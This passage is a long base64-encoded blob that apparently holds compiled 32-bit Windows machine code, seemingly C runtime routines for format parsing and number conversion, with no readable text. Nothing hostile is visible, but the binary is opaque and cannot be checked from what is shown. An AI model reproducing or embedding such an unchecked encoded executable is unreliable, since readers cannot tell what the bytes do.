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+DxBCJnej2//+EwHQxi4XI9v//K4XQ9v//iYXI9v//D4WH/P//i4249v//hckPhLcAAACLPI2kWQcQhf91TIOlvPj//wCNhcD4//+DpSz+//8AagBQjYUw/v//aMwBAABQ6GQ1AACLhSz+//+DxBCJhej2///reTPbjYXw9v//iZ3s9v//6SH9//+Lhej2//+D/wF0W4XAdFczyYvYM/aLx/ektTD+//8DwYmEtTD+//+D0gBGi8o783Xki4Us/v//hcl0qoP4cw+DcP///4mMhTD+//+LhSz+//9AiYXo9v//iYUs/v//6waLhej2//+LleT2//+F0g+EggAAADPJhcB0HovCM9IBhI0w/v//i4Us/v//E9KJhej2//9BO8h14oXSdFqD+HNzHImUhTD+//+LnSz+//9DiZ3o9v//iZ0s/v//6z+Dpbz4//8AjYXA+P//g6Us/v//AGoAUI2FMP7//2jMAQAAUOhbNAAAi50s/v//g8QQiZ3o9v//6waLnej2//+Lhcz2//+FwA+EEwQAAGoKM9JZ9/GJhdj2//+LyomNuPb//4XAD4StAwAAg/gmdgNqJlgPtgyFDlkHEA+2NIUPWQcQi/mJhbz2///B5wJXjQQxiYW8+P//jYXA+P//agBQ6Kd+//+LxsHgAlCLhbz2//8PtwSFDFkHEI0EhQhQBxBQjYXA+P//A8dQ6N09AQCLhbz4//8zyUGDxBg7wQ+HlAAAAIu9wPj//4X/dUMzwFCJhez2//+JhSz+//+NhfD2//9QaMwBAACNhTD+//9Q6G8zAACDxBCLnSz+//+wAYmd6Pb//4ud6Pb//+nBAgAAO/l1BIrB6+2F23T4M8kz9ovH96S1MP7//wPBiYS1MP7//4PSAEaLyjvzdeTppwAAAImMhTD+//+LnSz+//9DiZ0s/v//66Y72Q+H1wAAAIu9MP7//7vMAQAAiYUs/v//weACUI2FwPj//1CNhTD+//9TUOjbMgAAg8QQM8CF/3UaUImFvPj//4mFLP7//42FwPj//1BT6T3///+LnSz+//9AiZ3o9v//O/gPhEX///+F2w+EPf///zPJM/aLx/ektTD+//8DwYmEtTD+//+D0gBGi8o783XkhckPhAf///+LhSz+//+D+HMPgkL///8z242FwPj//1NQjYUw/v//iZ28+P//aMwBAABQiZ0s/v//6D0yAACKw4PEEIudLP7//+nJ/v//O8ONlcD4//8PksGEyXUGjZUw/v//iZXk9v//jZUw/v//hMl1Bo2VwPj//4mVyPb//4TJdAqL+Im93Pb//+sIi/uJndz2//+EyXUCi9gz0jP2iZVc/P//hf8PhAcBAACLheT2//+NjWD8//8rwYmF5Pb//40EsIuEBWD8//+Jhcz2//+FwHUdO/IPhcgAAAAhhLVg/P//jVYBiZVc/P//6bMAAAAzwDP/iYXQ9v//i86F2w+EkAAAAIP5c3RTO8p1F4OkjWD8//8AQAPGiYVc/P//i4XQ9v//i5XI9v//iwSC96XM9v//A8eD0gABhI1g/P//i4XQ9v//g9IAQEGJhdD2//+L+ouVXPz//zvDdaiF/3Q0g/lzD4T8AAAAO8p1EYOkjWD8//8AjUEBiYVc/P//i8cz/wGEjWD8//+LlVz8//8T/0HryIP5cw+EyAAAAIu93Pb//4uF5Pb//0Y79w+FDf///4vCiZUs/v//weACUI2FYPz//1CNhTD+//9ozAEAAFDoozAAAIPEELABi50s/v//iZ3o9v//hMAPhKcAAACLhdj2//8rhbz2//+Jhdj2//8PhVn8//+Ljbj2//+FyXRFizyNpFkHEIX/D4WIAAAAM8BQiYW8+P//iYUs/v//jYXA+P//UI2FMP7//2jMAQAAUOgyMAAAg8QQi50s/v//iZ3o9v//hdsPhewAAAAzyekFAQAAM8BQiYXs9v//iYUs/v//jYXw9v//UI2FMP7//2jMAQAAUOjtLwAAg8QQMsDpRf///4OlvPj//wCDpSz+//8AagDrZIP/AXSphdt0rTPJM/aLx/ektTD+//8DwYmEtTD+//+D0gBGi8o783XkhckPhHH///+LhSz+//+D+HNzGYmMhTD+//+LnSz+//9DiZ0s/v//6VP///8zwImFvPj//4mFLP7//1CNhcD4//9QjYUw/v//aMwBAABQ6FUvAACLhbD2//+DxBD/taj2//8PtoAIAwAAUOie7v//WVlqA1jpjhEAAIuEnSz+//+Dpcz2//8AD73AdANA6wIzwI1L/8HhBQPIi4Xg9v//iY289v//O42s9v//D4MpEQAAhcAPhCERAACLvdT2//8z2zP2iZ3k9v//M8mJnYz6//+Jtdz2//87vcT2//8PhD0GAACD+Q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//iYVc/P//jYXw9v//UGjMAQAAjYVg/P//UOibJwAAg8QQi41c/P//sAGJjeD2//+LjeD2///p7wIAADmVwPj//3UEisLr6YuN4Pb//4XJdPIz9jP/i4XA+P//96S9YPz//wPGiYS9YPz//4PSAEeL8jv5deDpvwAAAIm0hWD8//+LjVz8//9BiY1c/P//65iLjeD2//87yg+H6QAAAIu1YPz//7/MAQAAiYVc/P//weACUI2FwPj//4m1zPb//1CNhWD8//9XUOjtJgAAg8QQM8CF9nUaUImFvPj//4mFXPz//42FwPj//1BX6SP///+LjVz8//9AiY3g9v//O/APhCv///+FyQ+EI////4udzPb//zP2M/+Lw/ekvWD8//8DxomEvWD8//+D0gBHi/I7+XXki53k9v//hfYPhOH+//+LhVz8//+D+HMPgir///8zwFCJhbz4//+JhVz8//+NhcD4//9QjYVg/P//aMwBAABQ6EMmAACLjVz8//+DxBAywOmj/v//O8GNtcD4//8PksKE0nV5jbVg/P//jb3A+P//ib3E9v//iYXY9v//hNJ1CImN2Pb//4vIM9Iz/4mV7Pb//zmV2Pb//w+EJQEAAI2F8Pb//yvwibW49v//jQS+i4QF8Pb//4mFzPb//4XAdSU7+g+F7gAAACGEvfD2//+NVwGJlez2///p2QAAAI29YPz//+uLg6XU9v//ADPAiYXc9v//i/eFyQ+EqQAAAIP+c3RbO/J1F4OktfD2//8AQAPHiYXs9v//i4Xc9v//i5XE9v//iwSC96XM9v//A4XU9v//g9IAAYS18Pb//4uF3Pb//4PSAEBGiZXU9v//i5Xs9v//iYXc9v//O8F1oIO91Pb//wB0QIP+cw+EAAEAADvydRGDpLXw9v//AI1GAYmF7Pb//4uF1Pb//zPSAYS18Pb//xPSRomV1Pb//4XSi5Xs9v//dcCD/nMPhMAAAACLtbj2//9HO73Y9v//D4Xp/v//i8KJlVz8///B4AJQjYXw9v//UI2FYPz//2jMAQAAUOihJAAAg8QQsAGLjVz8//+JjeD2//+EwA+EoQAAAIuFyPb//yuF0Pb//4mFyPb//w+FLPz//4uVtPb//4XSD4Q9AQAAiwSVpFkHEImFzPb//4XAdXxQiYXU9P//iYVc/P//jYXY9P//UI2FYPz//2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